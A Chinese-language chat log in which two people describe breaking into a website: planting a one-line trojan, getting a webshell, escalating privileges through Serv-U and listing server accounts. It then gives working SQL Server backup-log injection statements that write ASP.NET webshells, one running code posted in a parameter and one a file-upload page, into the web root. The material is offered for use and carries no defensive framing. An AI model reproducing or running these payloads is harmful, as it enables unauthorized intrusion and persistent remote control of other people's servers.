克劳德:13Bean,怎么样了,图片管理系统后台好像没有什么可以利用的 13Bean:等等,我一句话木马写进去了,找了另一个后台,马上获得webshell 克劳德:好 。。。 。。。 13Bean:http://www.xxx.com/helper.asp 站长助手,密码123456 克劳德:偶像啊!!!! 13Bean:日 克劳德:赶快serv-u提权看看 13Bean:== 。。。 。。。 13Bean:哈哈,成功了 Net user User accounts for //XX服务器
------------------------------------------------------------------------------- Administrator goldsun Guest Iusr_xx IWAN_xx The command completed successfully.
克劳德:兄弟,我成功了,aspx的备份日志木马我搞定了,我搞了2个 alter database pubs set RECOVERY FULL create table pubs.dbo.cmd(a image) backup log pubs to disk = 'c:/TM' with init insert into pubs.dbo.cmd(a) values ('<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("i.aspx"),false);ow.Write(Request.Params["m"]);ow.Close()%> ') backup log pubs to disk = 'd:/haha.aspx' 这个和asp的一样,客户端post一个变量m 把木马代码丢在变量m里面 就ok了 这个是类似asp的一句话木马
下面这个是我找网上的asp.net的上传文件程序,修改精简了下,也可以用,我在本机调试好了
drop table pubs.dbo.cmd alter database pubs set RECOVERY FULL create table pubs.dbo.cmd(a image) backup log pubs to disk = 'c:/TM' with init insert into pubs.dbo.cmd(a) values ('<script language="c#" runat="server">private void bc(object o,EventArgs e) {string u="files";string filename;int pos=f.PostedFile.FileName.LastIndexOf("//");filename=f.PostedFile.FileName.Substring(pos + 1);f.PostedFile.SaveAs(Server.MapPath(u)+"//"+filename);}</script><form method="post" runat="server"><input type="file" id="f" runat="server"/><input type="submit" value="ss" runat="Server" OnServerClick="bc" /></form>') backup log pubs to disk = 'c:/inetpub/wwwroot/ha.aspx'